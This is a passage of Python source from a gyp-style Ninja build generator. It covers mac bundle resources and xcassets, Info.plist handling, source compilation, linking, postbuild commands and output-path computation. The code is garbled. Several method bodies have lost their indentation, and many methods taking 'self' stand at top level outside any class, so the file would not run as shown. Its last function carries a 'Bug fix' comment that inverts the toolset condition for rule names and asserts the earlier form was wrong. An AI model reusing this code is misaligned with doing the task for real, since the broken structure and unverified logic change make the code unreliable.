"""Writes ninja edges for 'mac_bundle_resources'."""
xcassets = []
for output, res in gyp.xcode_emulation.GetMacBundleResources(
generator_default_variables['PRODUCT_DIR'],
self.xcode_settings, map(self.GypPathToNinja, resources)):
output = self.ExpandSpecial(output)
if os.path.splitext(output)[-1] != '.xcassets':
isBinary = self.xcode_settings.IsBinaryOutputFormat(self.config_name)
self.ninja.build(output, 'mac_tool', res,
variables=[('mactool_cmd', 'copy-bundle-resource'), \
('binary', isBinary)])
bundle_depends.append(output)
else:
xcassets.append(res)
return xcassets
  def WriteMacXCassets(self, xcassets, bundle_depends):
    """Writes ninja edges for 'mac_bundle_resources' .xcassets files.

    This add an invocation of 'actool' via the 'mac_tool.py' helper script.
    It assumes that the assets catalogs define at least one imageset and
    thus an Assets.car file will be generated in the application resources
    directory. If this is not the case, then the build will probably be done
    at each invocation of ninja.

    Returns the path of the partial Info.plist generated by actool, or None
    if no extra actool arguments were needed.
    """
    if not xcassets:
      return
    # Some xcode settings become actool command-line flags.
    extra_arguments = {}
    settings_to_arg = {
        'XCASSETS_APP_ICON': 'app-icon',
        'XCASSETS_LAUNCH_IMAGE': 'launch-image',
    }
    settings = self.xcode_settings.xcode_settings[self.config_name]
    for settings_key, arg_name in settings_to_arg.iteritems():
      value = settings.get(settings_key)
      if value:
        extra_arguments[arg_name] = value
    partial_info_plist = None
    if extra_arguments:
      # actool emits a partial plist that is later merged into Info.plist.
      partial_info_plist = self.GypPathToUniqueOutput(
          'assetcatalog_generated_info.plist')
      extra_arguments['output-partial-info-plist'] = partial_info_plist
    outputs = []
    outputs.append(
        os.path.join(
            self.xcode_settings.GetBundleResourceFolder(),
            'Assets.car'))
    if partial_info_plist:
      outputs.append(partial_info_plist)
    # The arguments dict is passed to mac_tool.py as one JSON shell word.
    keys = QuoteShellArgument(json.dumps(extra_arguments), self.flavor)
    extra_env = self.xcode_settings.GetPerTargetSettings()
    env = self.GetSortedXcodeEnv(additional_settings=extra_env)
    env = self.ComputeExportEnvString(env)
    bundle_depends.extend(self.ninja.build(
        outputs, 'compile_xcassets', xcassets,
        variables=[('env', env), ('keys', keys)]))
    return partial_info_plist
  def WriteMacInfoPlist(self, partial_info_plist, bundle_depends):
    """Write build rules for bundle Info.plist files.

    partial_info_plist: optional plist emitted by actool (WriteMacXCassets)
        to merge into the main Info.plist.
    bundle_depends: list, mutated; receives the final plist output path.
    """
    info_plist, out, defines, extra_env = gyp.xcode_emulation.GetMacInfoPlist(
        generator_default_variables['PRODUCT_DIR'],
        self.xcode_settings, self.GypPathToNinja)
    if not info_plist:
      return
    out = self.ExpandSpecial(out)
    if defines:
      # Create an intermediate file to store preprocessed results.
      intermediate_plist = self.GypPathToUniqueOutput(
          os.path.basename(info_plist))
      defines = ' '.join([Define(d, self.flavor) for d in defines])
      info_plist = self.ninja.build(
          intermediate_plist, 'preprocess_infoplist', info_plist,
          variables=[('defines',defines)])
    env = self.GetSortedXcodeEnv(additional_settings=extra_env)
    env = self.ComputeExportEnvString(env)
    if partial_info_plist:
      # Merge the actool-generated partial plist into the main plist.
      intermediate_plist = self.GypPathToUniqueOutput('merged_info.plist')
      info_plist = self.ninja.build(
          intermediate_plist, 'merge_infoplist',
          [partial_info_plist, info_plist])
    # Extra plist entries are passed to mac_tool.py as one JSON shell word.
    keys = self.xcode_settings.GetExtraPlistItems(self.config_name)
    keys = QuoteShellArgument(json.dumps(keys), self.flavor)
    isBinary = self.xcode_settings.IsBinaryOutputFormat(self.config_name)
    self.ninja.build(out, 'copy_infoplist', info_plist,
                     variables=[('env', env), ('keys', keys),
                                ('binary', isBinary)])
    bundle_depends.append(out)
def WriteSources(self, ninja_file, config_name, config, sources, predepends,
precompiled_header, spec):
"""Write build rules to compile all of |sources|."""
if self.toolset == 'host':
self.ninja.variable('ar', '$ar_host')
self.ninja.variable('cc', '$cc_host')
self.ninja.variable('cxx', '$cxx_host')
self.ninja.variable('ld', '$ld_host')
self.ninja.variable('ldxx', '$ldxx_host')
self.ninja.variable('nm', '$nm_host')
self.ninja.variable('readelf', '$readelf_host')
if self.flavor != 'mac' or len(self.archs) == 1:
return self.WriteSourcesForArch(
self.ninja, config_name, config, sources, predepends,
precompiled_header, spec)
else:
return dict((arch, self.WriteSourcesForArch(
self.arch_subninjas[arch], config_name, config, sources, predepends,
precompiled_header, spec, arch=arch))
for arch in self.archs)
  def WriteSourcesForArch(self, ninja_file, config_name, config, sources,
                          predepends, precompiled_header, spec, arch=None):
    """Write build rules to compile all of |sources|.

    Returns the list of object-file outputs (the future link inputs).
    |arch| selects the architecture for fat mac builds; None otherwise.
    """
    # First gather the compile flags, per flavor.
    extra_defines = []
    if self.flavor == 'mac':
      cflags = self.xcode_settings.GetCflags(config_name, arch=arch)
      cflags_c = self.xcode_settings.GetCflagsC(config_name)
      cflags_cc = self.xcode_settings.GetCflagsCC(config_name)
      # ObjC/ObjC++ flags extend the plain C/C++ flags via ninja variable
      # references.
      cflags_objc = ['$cflags_c'] + \
                    self.xcode_settings.GetCflagsObjC(config_name)
      cflags_objcc = ['$cflags_cc'] + \
                     self.xcode_settings.GetCflagsObjCC(config_name)
    elif self.flavor == 'win':
      asmflags = self.msvs_settings.GetAsmflags(config_name)
      cflags = self.msvs_settings.GetCflags(config_name)
      cflags_c = self.msvs_settings.GetCflagsC(config_name)
      cflags_cc = self.msvs_settings.GetCflagsCC(config_name)
      extra_defines = self.msvs_settings.GetComputedDefines(config_name)
      # See comment at cc_command for why there's two .pdb files.
      pdbpath_c = pdbpath_cc = self.msvs_settings.GetCompilerPdbName(
          config_name, self.ExpandSpecial)
      if not pdbpath_c:
        # No explicit pdb name configured; derive one from the obj dir and
        # target name.
        obj = 'obj'
        if self.toolset != 'target':
          obj += '.' + self.toolset
        pdbpath = os.path.normpath(os.path.join(obj, self.base_dir, self.name))
        pdbpath_c = pdbpath + '.c.pdb'
        pdbpath_cc = pdbpath + '.cc.pdb'
      self.WriteVariableList(ninja_file, 'pdbname_c', [pdbpath_c])
      self.WriteVariableList(ninja_file, 'pdbname_cc', [pdbpath_cc])
      self.WriteVariableList(ninja_file, 'pchprefix', [self.name])
    else:
      cflags = config.get('cflags', [])
      cflags_c = config.get('cflags_c', [])
      cflags_cc = config.get('cflags_cc', [])
      # Respect environment variables related to build, but target-specific
      # flags can still override them.
      if self.toolset == 'target':
        cflags_c = (os.environ.get('CPPFLAGS', '').split() +
                    os.environ.get('CFLAGS', '').split() + cflags_c)
        cflags_cc = (os.environ.get('CPPFLAGS', '').split() +
                     os.environ.get('CXXFLAGS', '').split() + cflags_cc)
      elif self.toolset == 'host':
        cflags_c = (os.environ.get('CPPFLAGS_host', '').split() +
                    os.environ.get('CFLAGS_host', '').split() + cflags_c)
        cflags_cc = (os.environ.get('CPPFLAGS_host', '').split() +
                     os.environ.get('CXXFLAGS_host', '').split() + cflags_cc)
    defines = config.get('defines', []) + extra_defines
    self.WriteVariableList(ninja_file, 'defines',
                           [Define(d, self.flavor) for d in defines])
    if self.flavor == 'win':
      self.WriteVariableList(ninja_file, 'asmflags',
                             map(self.ExpandSpecial, asmflags))
      self.WriteVariableList(ninja_file, 'rcflags',
          [QuoteShellArgument(self.ExpandSpecial(f), self.flavor)
           for f in self.msvs_settings.GetRcflags(config_name,
                                                  self.GypPathToNinja)])
    include_dirs = config.get('include_dirs', [])
    env = self.GetToolchainEnv()
    if self.flavor == 'win':
      include_dirs = self.msvs_settings.AdjustIncludeDirs(include_dirs,
                                                          config_name)
    self.WriteVariableList(ninja_file, 'includes',
        [QuoteShellArgument('-I' + self.GypPathToNinja(i, env), self.flavor)
         for i in include_dirs])
    if self.flavor == 'win':
      midl_include_dirs = config.get('midl_include_dirs', [])
      midl_include_dirs = self.msvs_settings.AdjustMidlIncludeDirs(
          midl_include_dirs, config_name)
      self.WriteVariableList(ninja_file, 'midl_includes',
          [QuoteShellArgument('-I' + self.GypPathToNinja(i, env), self.flavor)
           for i in midl_include_dirs])
    pch_commands = precompiled_header.GetPchBuildCommands(arch)
    if self.flavor == 'mac':
      # Most targets use no prefix header, so only write these if needed.
      for ext, var in [('c', 'cflags_pch_c'), ('cc', 'cflags_pch_cc'),
                       ('m', 'cflags_pch_objc'), ('mm', 'cflags_pch_objcc')]:
        include = precompiled_header.GetInclude(ext, arch)
        if include: ninja_file.variable(var, include)
    arflags = config.get('arflags', [])
    self.WriteVariableList(ninja_file, 'cflags',
                           map(self.ExpandSpecial, cflags))
    self.WriteVariableList(ninja_file, 'cflags_c',
                           map(self.ExpandSpecial, cflags_c))
    self.WriteVariableList(ninja_file, 'cflags_cc',
                           map(self.ExpandSpecial, cflags_cc))
    if self.flavor == 'mac':
      self.WriteVariableList(ninja_file, 'cflags_objc',
                             map(self.ExpandSpecial, cflags_objc))
      self.WriteVariableList(ninja_file, 'cflags_objcc',
                             map(self.ExpandSpecial, cflags_objcc))
    self.WriteVariableList(ninja_file, 'arflags',
                           map(self.ExpandSpecial, arflags))
    ninja_file.newline()
    # Now write a compile edge per source file, choosing the compile rule
    # and object extension from the file extension and flavor.
    outputs = []
    has_rc_source = False
    for source in sources:
      filename, ext = os.path.splitext(source)
      ext = ext[1:]
      obj_ext = self.obj_ext
      if ext in ('cc', 'cpp', 'cxx'):
        command = 'cxx'
        self.uses_cpp = True
      elif ext == 'c' or (ext == 'S' and self.flavor != 'win'):
        command = 'cc'
      elif ext == 's' and self.flavor != 'win': # Doesn't generate .o.d files.
        command = 'cc_s'
      elif (self.flavor == 'win' and ext == 'asm' and
            not self.msvs_settings.HasExplicitAsmRules(spec)):
        command = 'asm'
        # Add the _asm suffix as msvs is capable of handling .cc and
        # .asm files of the same name without collision.
        obj_ext = '_asm.obj'
      elif self.flavor == 'mac' and ext == 'm':
        command = 'objc'
      elif self.flavor == 'mac' and ext == 'mm':
        command = 'objcxx'
        self.uses_cpp = True
      elif self.flavor == 'win' and ext == 'rc':
        command = 'rc'
        obj_ext = '.res'
        has_rc_source = True
      else:
        # Ignore unhandled extensions.
        continue
      input = self.GypPathToNinja(source)
      output = self.GypPathToUniqueOutput(filename + obj_ext)
      if arch is not None:
        output = AddArch(output, arch)
      implicit = precompiled_header.GetObjDependencies([input], [output], arch)
      variables = []
      if self.flavor == 'win':
        variables, output, implicit = precompiled_header.GetFlagsModifications(
            input, output, implicit, command, cflags_c, cflags_cc,
            self.ExpandSpecial)
      ninja_file.build(output, command, input,
                       implicit=[gch for _, _, gch in implicit],
                       order_only=predepends, variables=variables)
      outputs.append(output)
    if has_rc_source:
      resource_include_dirs = config.get('resource_include_dirs', include_dirs)
      self.WriteVariableList(ninja_file, 'resource_includes',
          [QuoteShellArgument('-I' + self.GypPathToNinja(i, env), self.flavor)
           for i in resource_include_dirs])
    self.WritePchTargets(ninja_file, pch_commands)
    ninja_file.newline()
    return outputs
def WritePchTargets(self, ninja_file, pch_commands):
"""Writes ninja rules to compile prefix headers."""
if not pch_commands:
return
for gch, lang_flag, lang, input in pch_commands:
var_name = {
'c': 'cflags_pch_c',
'cc': 'cflags_pch_cc',
'm': 'cflags_pch_objc',
'mm': 'cflags_pch_objcc',
}[lang]
map = { 'c': 'cc', 'cc': 'cxx', 'm': 'objc', 'mm': 'objcxx', }
cmd = map.get(lang)
ninja_file.build(gch, cmd, input, variables=[(var_name, lang_flag)])
  def WriteLink(self, spec, config_name, config, link_deps):
    """Write out a link step. Fills out target.binary.

    For fat mac builds, links each arch inside its subninja and then
    combines the per-arch binaries with lipo (or 'solipo' for shared
    libraries, which also produces a .TOC file).
    """
    if self.flavor != 'mac' or len(self.archs) == 1:
      return self.WriteLinkForArch(
          self.ninja, spec, config_name, config, link_deps)
    else:
      output = self.ComputeOutput(spec)
      # link_deps is a per-arch dict here; link each slice separately.
      inputs = [self.WriteLinkForArch(self.arch_subninjas[arch], spec,
                                      config_name, config, link_deps[arch],
                                      arch=arch)
                for arch in self.archs]
      extra_bindings = []
      build_output = output
      if not self.is_mac_bundle:
        self.AppendPostbuildVariable(extra_bindings, spec, output, output)
      # TODO(yyanagisawa): more work needed to fix:
      # https://code.google.com/p/gyp/issues/detail?id=411
      if (spec['type'] in ('shared_library', 'loadable_module') and
          not self.is_mac_bundle):
        extra_bindings.append(('lib', output))
        self.ninja.build([output, output + '.TOC'], 'solipo', inputs,
            variables=extra_bindings)
      else:
        self.ninja.build(build_output, 'lipo', inputs, variables=extra_bindings)
      return output
def WriteLinkForArch(self, ninja_file, spec, config_name, config,
                     link_deps, arch=None):
  """Write out a link step. Fills out target.binary.

  Emits one link/solink/solink_module build edge into |ninja_file| for a
  single architecture (|arch| is None in the single-arch case) and
  returns the path of the linked binary.
  """
  command = {
    'executable': 'link',
    'loadable_module': 'solink_module',
    'shared_library': 'solink',
  }[spec['type']]
  command_suffix = ''

  implicit_deps = set()
  solibs = set()

  if 'dependencies' in spec:
    # Two kinds of dependencies:
    # - Linkable dependencies (like a .a or a .so): add them to the link line.
    # - Non-linkable dependencies (like a rule that generates a file
    #   and writes a stamp file): add them to implicit_deps
    extra_link_deps = set()
    for dep in spec['dependencies']:
      target = self.target_outputs.get(dep)
      if not target:
        continue
      linkable = target.Linkable()
      if linkable:
        new_deps = []
        if (self.flavor == 'win' and
            target.component_objs and
            self.msvs_settings.IsUseLibraryDependencyInputs(config_name)):
          # Link directly against the dependency's object files.
          new_deps = target.component_objs
        elif self.flavor == 'win' and target.import_lib:
          new_deps = [target.import_lib]
        elif target.UsesToc(self.flavor):
          # Depend on the '.TOC' companion file instead of the library
          # itself, so this edge is rebuilt only when the TOC changes.
          solibs.add(target.binary)
          implicit_deps.add(target.binary + '.TOC')
        else:
          new_deps = [target.binary]
        for new_dep in new_deps:
          if new_dep not in extra_link_deps:
            extra_link_deps.add(new_dep)
            link_deps.append(new_dep)

      final_output = target.FinalOutput()
      if not linkable or final_output != target.binary:
        implicit_deps.add(final_output)

  extra_bindings = []
  if self.uses_cpp and self.flavor != 'win':
    # Use the C++ linker driver when any C++ is involved.
    extra_bindings.append(('ld', '$ldxx'))

  output = self.ComputeOutput(spec, arch)
  if arch is None and not self.is_mac_bundle:
    self.AppendPostbuildVariable(extra_bindings, spec, output, output)

  is_executable = spec['type'] == 'executable'
  # The ldflags config key is not used on mac or win. On those platforms
  # linker flags are set via xcode_settings and msvs_settings, respectively.
  env_ldflags = os.environ.get('LDFLAGS', '').split()
  if self.flavor == 'mac':
    ldflags = self.xcode_settings.GetLdflags(config_name,
        self.ExpandSpecial(generator_default_variables['PRODUCT_DIR']),
        self.GypPathToNinja, arch)
    ldflags = env_ldflags + ldflags
  elif self.flavor == 'win':
    manifest_base_name = self.GypPathToUniqueOutput(
        self.ComputeOutputFileName(spec))
    ldflags, intermediate_manifest, manifest_files = \
        self.msvs_settings.GetLdflags(config_name, self.GypPathToNinja,
                                      self.ExpandSpecial, manifest_base_name,
                                      output, is_executable,
                                      self.toplevel_build)
    ldflags = env_ldflags + ldflags
    self.WriteVariableList(ninja_file, 'manifests', manifest_files)
    implicit_deps = implicit_deps.union(manifest_files)
    if intermediate_manifest:
      self.WriteVariableList(
          ninja_file, 'intermediatemanifest', [intermediate_manifest])
    command_suffix = _GetWinLinkRuleNameSuffix(
        self.msvs_settings.IsEmbedManifest(config_name))
    def_file = self.msvs_settings.GetDefFile(self.GypPathToNinja)
    if def_file:
      implicit_deps.add(def_file)
  else:
    # Respect environment variables related to build, but target-specific
    # flags can still override them.
    ldflags = env_ldflags + config.get('ldflags', [])
    if is_executable and len(solibs):
      # Executables that link against shared libs find them at runtime
      # under lib/ (or lib/<toolset> for non-default toolsets).
      rpath = 'lib/'
      if self.toolset != 'target':
        rpath += self.toolset
      ldflags.append(r'-Wl,-rpath=\$$ORIGIN/%s' % rpath)
      ldflags.append('-Wl,-rpath-link=%s' % rpath)
  self.WriteVariableList(ninja_file, 'ldflags',
                         map(self.ExpandSpecial, ldflags))

  library_dirs = config.get('library_dirs', [])
  if self.flavor == 'win':
    library_dirs = [self.msvs_settings.ConvertVSMacros(l, config_name)
                    for l in library_dirs]
    library_dirs = ['/LIBPATH:' + QuoteShellArgument(self.GypPathToNinja(l),
                                                     self.flavor)
                    for l in library_dirs]
  else:
    library_dirs = [QuoteShellArgument('-L' + self.GypPathToNinja(l),
                                       self.flavor)
                    for l in library_dirs]

  libraries = gyp.common.uniquer(map(self.ExpandSpecial,
                                     spec.get('libraries', [])))
  if self.flavor == 'mac':
    libraries = self.xcode_settings.AdjustLibraries(libraries, config_name)
  elif self.flavor == 'win':
    libraries = self.msvs_settings.AdjustLibraries(libraries)

  self.WriteVariableList(ninja_file, 'libs', library_dirs + libraries)

  linked_binary = output

  if command in ('solink', 'solink_module'):
    extra_bindings.append(('soname', os.path.split(output)[1]))
    extra_bindings.append(('lib',
                          gyp.common.EncodePOSIXShellArgument(output)))
    if self.flavor != 'win':
      link_file_list = output
      if self.is_mac_bundle:
        # 'Dependency Framework.framework/Versions/A/Dependency Framework' ->
        # 'Dependency Framework.framework.rsp'
        link_file_list = self.xcode_settings.GetWrapperName()
      if arch:
        link_file_list += '.' + arch
      link_file_list += '.rsp'
      # If an rspfile contains spaces, ninja surrounds the filename with
      # quotes around it and then passes it to open(), creating a file with
      # quotes in its name (and when looking for the rsp file, the name
      # makes it through bash which strips the quotes) :-/
      link_file_list = link_file_list.replace(' ', '_')
      extra_bindings.append(
        ('link_file_list',
          gyp.common.EncodePOSIXShellArgument(link_file_list)))
    if self.flavor == 'win':
      extra_bindings.append(('binary', output))
      if ('/NOENTRY' not in ldflags and
          not self.msvs_settings.GetNoImportLibrary(config_name)):
        self.target.import_lib = output + '.lib'
        # The import library is produced alongside the DLL.
        extra_bindings.append(('implibflag',
                               '/IMPLIB:%s' % self.target.import_lib))
        pdbname = self.msvs_settings.GetPDBName(
            config_name, self.ExpandSpecial, output + '.pdb')
        output = [output, self.target.import_lib]
        if pdbname:
          output.append(pdbname)
    elif not self.is_mac_bundle:
      # Non-bundle shared libs also produce a '.TOC' used by dependents.
      output = [output, output + '.TOC']
    else:
      command = command + '_notoc'
  elif self.flavor == 'win':
    extra_bindings.append(('binary', output))
    pdbname = self.msvs_settings.GetPDBName(
        config_name, self.ExpandSpecial, output + '.pdb')
    if pdbname:
      output = [output, pdbname]

  if len(solibs):
    extra_bindings.append(('solibs', gyp.common.EncodePOSIXShellList(solibs)))

  ninja_file.build(output, command + command_suffix, link_deps,
                   implicit=list(implicit_deps),
                   variables=extra_bindings)
  return linked_binary
def WriteTarget(self, spec, config_name, config, link_deps, compile_deps):
  """Write the final build step for the target and record the result in
  self.target.binary, which is returned."""
  # True if at least one dependency contributes something linkable.
  extra_link_deps = any(self.target_outputs.get(dep).Linkable()
                        for dep in spec.get('dependencies', [])
                        if dep in self.target_outputs)
  if spec['type'] == 'none' or (not link_deps and not extra_link_deps):
    # TODO(evan): don't call this function for 'none' target types, as
    # it doesn't do anything, and we fake out a 'binary' with a stamp file.
    self.target.binary = compile_deps
    self.target.type = 'none'
  elif spec['type'] == 'static_library':
    self.target.binary = self.ComputeOutput(spec)
    if (self.flavor not in ('mac', 'openbsd', 'win') and not
        self.is_standalone_static_library):
      # Thin archives are cheaper to produce; standalone static libraries
      # get a regular archive below so they can be shipped on their own.
      self.ninja.build(self.target.binary, 'alink_thin', link_deps,
                       order_only=compile_deps)
    else:
      variables = []
      if self.xcode_settings:
        libtool_flags = self.xcode_settings.GetLibtoolflags(config_name)
        if libtool_flags:
          variables.append(('libtool_flags', libtool_flags))
      if self.msvs_settings:
        libflags = self.msvs_settings.GetLibFlags(config_name,
                                                  self.GypPathToNinja)
        variables.append(('libflags', libflags))

      if self.flavor != 'mac' or len(self.archs) == 1:
        self.AppendPostbuildVariable(variables, spec,
                                     self.target.binary, self.target.binary)
        self.ninja.build(self.target.binary, 'alink', link_deps,
                         order_only=compile_deps, variables=variables)
      else:
        # Multi-arch mac: archive each arch separately, then combine the
        # per-arch .a files into the final output.
        inputs = []
        for arch in self.archs:
          output = self.ComputeOutput(spec, arch)
          self.arch_subninjas[arch].build(output, 'alink', link_deps[arch],
                                          order_only=compile_deps,
                                          variables=variables)
          inputs.append(output)
        # TODO: It's not clear if libtool_flags should be passed to the alink
        # call that combines single-arch .a files into a fat .a file.
        self.AppendPostbuildVariable(variables, spec,
                                     self.target.binary, self.target.binary)
        self.ninja.build(self.target.binary, 'alink', inputs,
                         # FIXME: test proving order_only=compile_deps isn't
                         # needed.
                         variables=variables)
  else:
    self.target.binary = self.WriteLink(spec, config_name, config, link_deps)
  return self.target.binary
def WriteMacBundle(self, spec, mac_bundle_depends, is_empty):
  """Write the build edge that assembles a mac bundle.

  Frameworks and loadable modules go through the 'package_framework'
  rule; other bundle types (and empty bundles) just get a stamp.  Sets
  self.target.bundle and returns the bundle output path.
  """
  assert self.is_mac_bundle
  package_framework = spec['type'] in ('shared_library', 'loadable_module')
  output = self.ComputeMacBundleOutput()
  if is_empty:
    output += '.stamp'
  variables = []
  self.AppendPostbuildVariable(variables, spec, output, self.target.binary,
                               is_command_start=not package_framework)
  if package_framework and not is_empty:
    # The framework version string is needed by the package_framework rule
    # (presumably for the Foo.framework/Versions/<version> layout — the
    # rule itself is defined elsewhere).
    variables.append(('version', self.xcode_settings.GetFrameworkVersion()))
    self.ninja.build(output, 'package_framework', mac_bundle_depends,
                     variables=variables)
  else:
    self.ninja.build(output, 'stamp', mac_bundle_depends,
                     variables=variables)
  self.target.bundle = output
  return output
def GetToolchainEnv(self, additional_settings=None):
  """Returns the variables the toolchain would set for build steps."""
  # The Xcode environment is computed unconditionally (preserving the
  # original call order); on Windows it is superseded by the MSVS macro
  # environment.
  env = self.GetSortedXcodeEnv(additional_settings=additional_settings)
  if self.flavor != 'win':
    return env
  return self.GetMsvsToolchainEnv(additional_settings=additional_settings)
def GetMsvsToolchainEnv(self, additional_settings=None):
  """Returns the variables Visual Studio would set for build steps."""
  # |additional_settings| is accepted for interface parity with the Xcode
  # variant but is not consulted here.
  settings = self.msvs_settings
  return settings.GetVSMacroEnv('$!PRODUCT_DIR', config=self.config_name)
def GetSortedXcodeEnv(self, additional_settings=None):
  """Returns the variables Xcode would set for build steps."""
  assert self.abs_build_dir
  return gyp.xcode_emulation.GetSortedXcodeEnv(
      self.xcode_settings, self.abs_build_dir,
      os.path.join(self.abs_build_dir, self.build_to_base),
      self.config_name, additional_settings)
def GetSortedXcodePostbuildEnv(self):
  """Returns the variables Xcode would set for postbuild steps."""
  # CHROMIUM_STRIP_SAVE_FILE is a chromium-specific hack.
  # TODO(thakis): It would be nice to have some general mechanism instead.
  strip_save_file = self.xcode_settings.GetPerTargetSetting(
      'CHROMIUM_STRIP_SAVE_FILE')
  extra = ({'CHROMIUM_STRIP_SAVE_FILE': strip_save_file}
           if strip_save_file else {})
  return self.GetSortedXcodeEnv(additional_settings=extra)
def AppendPostbuildVariable(self, variables, spec, output, binary,
                            is_command_start=False):
  """Appends a ('postbuilds', ...) binding to |variables| when |output|
  has a postbuild command; otherwise leaves |variables| untouched."""
  cmd = self.GetPostbuildCommand(spec, output, binary, is_command_start)
  if not cmd:
    return
  variables.append(('postbuilds', cmd))
def GetPostbuildCommand(self, spec, output, output_binary, is_command_start):
  """Returns a shell command that runs all the postbuilds, and removes
  |output| if any of them fails. If |is_command_start| is False, then the
  returned string will start with ' && '."""
  # Postbuilds only exist in Xcode-flavored builds on non-'none' targets.
  if not self.xcode_settings or spec['type'] == 'none' or not output:
    return ''
  output = QuoteShellArgument(output, self.flavor)
  postbuilds = gyp.xcode_emulation.GetSpecPostbuildCommands(spec, quiet=True)
  if output_binary is not None:
    postbuilds = self.xcode_settings.AddImplicitPostbuilds(
        self.config_name,
        os.path.normpath(os.path.join(self.base_to_build, output)),
        QuoteShellArgument(
            os.path.normpath(os.path.join(self.base_to_build, output_binary)),
            self.flavor),
        postbuilds, quiet=True)

  if not postbuilds:
    return ''
  # Postbuilds expect to be run in the gyp file's directory, so insert an
  # implicit postbuild to cd to there.
  postbuilds.insert(0, gyp.common.EncodePOSIXShellList(
      ['cd', self.build_to_base]))
  env = self.ComputeExportEnvString(self.GetSortedXcodePostbuildEnv())
  # G will be non-null if any postbuild fails. Run all postbuilds in a
  # subshell.  ('$$' survives ninja's variable expansion as a literal '$'.)
  commands = env + ' (' + \
      ' && '.join([ninja_syntax.escape(command) for command in postbuilds])
  command_string = (commands + '); G=$$?; '
                    # Remove the final output if any postbuild failed.
                    '((exit $$G) || rm -rf %s) ' % output + '&& exit $$G)')
  if is_command_start:
    return '(' + command_string + ' && '
  else:
    return '$ && (' + command_string
def ComputeExportEnvString(self, env):
  """Return a shell snippet ('export K=V; export K2=V2; ...') that
  exports every (key, value) pair in |env|, with values shell-quoted and
  ninja-escaped."""
  return ' '.join(
      'export %s=%s;' % (key, ninja_syntax.escape(
          gyp.common.EncodePOSIXShellArgument(value)))
      for key, value in env)
def ComputeMacBundleOutput(self):
  """Return the 'output' (full output path) to a bundle output directory."""
  assert self.is_mac_bundle
  return self.ExpandSpecial(os.path.join(
      generator_default_variables['PRODUCT_DIR'],
      self.xcode_settings.GetWrapperName()))
def ComputeOutputFileName(self, spec, type=None):
  """Compute the filename of the final output for the current target.

  |type| overrides spec['type'] when given.  The prefix and extension
  come from the flavor's default variables unless the spec provides
  product_prefix / product_extension; product_name overrides the
  target-name-derived basename.
  """
  if not type:
    type = spec['type']

  default_variables = copy.copy(generator_default_variables)
  CalculateVariables(default_variables, {'flavor': self.flavor})

  # Compute filename prefix: the product prefix, or a default for
  # the product type.
  DEFAULT_PREFIX = {
    'loadable_module': default_variables['SHARED_LIB_PREFIX'],
    'shared_library': default_variables['SHARED_LIB_PREFIX'],
    'static_library': default_variables['STATIC_LIB_PREFIX'],
    'executable': default_variables['EXECUTABLE_PREFIX'],
  }
  prefix = spec.get('product_prefix', DEFAULT_PREFIX.get(type, ''))

  # Compute filename extension: the product extension, or a default
  # for the product type.
  DEFAULT_EXTENSION = {
      'loadable_module': default_variables['SHARED_LIB_SUFFIX'],
      'shared_library': default_variables['SHARED_LIB_SUFFIX'],
      'static_library': default_variables['STATIC_LIB_SUFFIX'],
      'executable': default_variables['EXECUTABLE_SUFFIX'],
  }
  extension = spec.get('product_extension')
  if extension:
    extension = '.' + extension
  else:
    extension = DEFAULT_EXTENSION.get(type, '')

  if 'product_name' in spec:
    # If we were given an explicit name, use that.
    target = spec['product_name']
  else:
    # Otherwise, derive a name from the target name.
    target = spec['target_name']
    if prefix == 'lib':
      # Snip out an extra 'lib' from libs if appropriate.
      target = StripPrefix(target, 'lib')

  if type in ('static_library', 'loadable_module', 'shared_library',
              'executable'):
    return '%s%s%s' % (prefix, target, extension)
  elif type == 'none':
    # 'none' targets are faked out with a stamp file (see WriteTarget).
    return '%s.stamp' % target
  else:
    raise Exception('Unhandled output type %s' % type)
def ComputeOutput(self, spec, arch=None):
  """Compute the path for the final output of the spec.

  |arch| is set for per-arch intermediate outputs in multi-arch mac
  builds; those land in an arch/ staging directory rather than the
  regular output locations.
  """
  type = spec['type']

  if self.flavor == 'win':
    # MSVS settings may override the output name wholesale.
    override = self.msvs_settings.GetOutputName(self.config_name,
                                                self.ExpandSpecial)
    if override:
      return override

  if arch is None and self.flavor == 'mac' and type in (
      'static_library', 'executable', 'shared_library', 'loadable_module'):
    filename = self.xcode_settings.GetExecutablePath()
  else:
    filename = self.ComputeOutputFileName(spec, type)

  if arch is None and 'product_dir' in spec:
    path = os.path.join(spec['product_dir'], filename)
    return self.ExpandSpecial(path)

  # Some products go into the output root, libraries go into shared library
  # dir, and everything else goes into the normal place.
  type_in_output_root = ['executable', 'loadable_module']
  if self.flavor == 'mac' and self.toolset == 'target':
    type_in_output_root += ['shared_library', 'static_library']
  elif self.flavor == 'win' and self.toolset == 'target':
    type_in_output_root += ['shared_library']

  if arch is not None:
    # Make sure partial executables don't end up in a bundle or the regular
    # output directory.
    archdir = 'arch'
    if self.toolset != 'target':
      archdir = os.path.join('arch', '%s' % self.toolset)
    return os.path.join(archdir, AddArch(filename, arch))
  elif type in type_in_output_root or self.is_standalone_static_library:
    return filename
  elif type == 'shared_library':
    libdir = 'lib'
    if self.toolset != 'target':
      # Non-default toolsets (e.g. host) get their own lib subdirectory.
      libdir = os.path.join('lib', '%s' % self.toolset)
    return os.path.join(libdir, filename)
  else:
    return self.GypPathToUniqueOutput(filename, qualified=False)
def WriteVariableList(self, ninja_file, var, values):
  """Writes ninja variable |var| as the space-joined contents of |values|
  (a sequence of strings, or None for empty)."""
  # A bare string would be silently joined character-by-character.
  assert not isinstance(values, str)
  ninja_file.variable(var, ' '.join(values if values is not None else []))
def WriteNewNinjaRule(self, name, args, description, is_cygwin, env, pool,
                      depfile=None):
  """Write out a new ninja "rule" statement for a given command.

  Returns the name of the new rule, and a copy of |args| with variables
  expanded.
  """
  if self.flavor == 'win':
    args = [self.msvs_settings.ConvertVSMacros(
                arg, self.base_to_build, config=self.config_name)
            for arg in args]
    description = self.msvs_settings.ConvertVSMacros(
        description, config=self.config_name)
  elif self.flavor == 'mac':
    # |env| is an empty list on non-mac.
    args = [gyp.xcode_emulation.ExpandEnvVars(arg, env) for arg in args]
    description = gyp.xcode_emulation.ExpandEnvVars(description, env)

  # TODO: we shouldn't need to qualify names; we do it because
  # currently the ninja rule namespace is global, but it really
  # should be scoped to the subninja.
  rule_name = self.name
  # Only non-default toolsets (e.g. 'host') need the toolset qualifier.
  # (Bug fix: the condition used to be `== 'target'`, which appended the
  # suffix for the default toolset and omitted it for the toolsets that
  # actually need disambiguation; every other toolset-qualified path in
  # this writer uses `!= 'target'`.)
  if self.toolset != 'target':
    rule_name += '.' + self.toolset
  rule_name += '.' + name
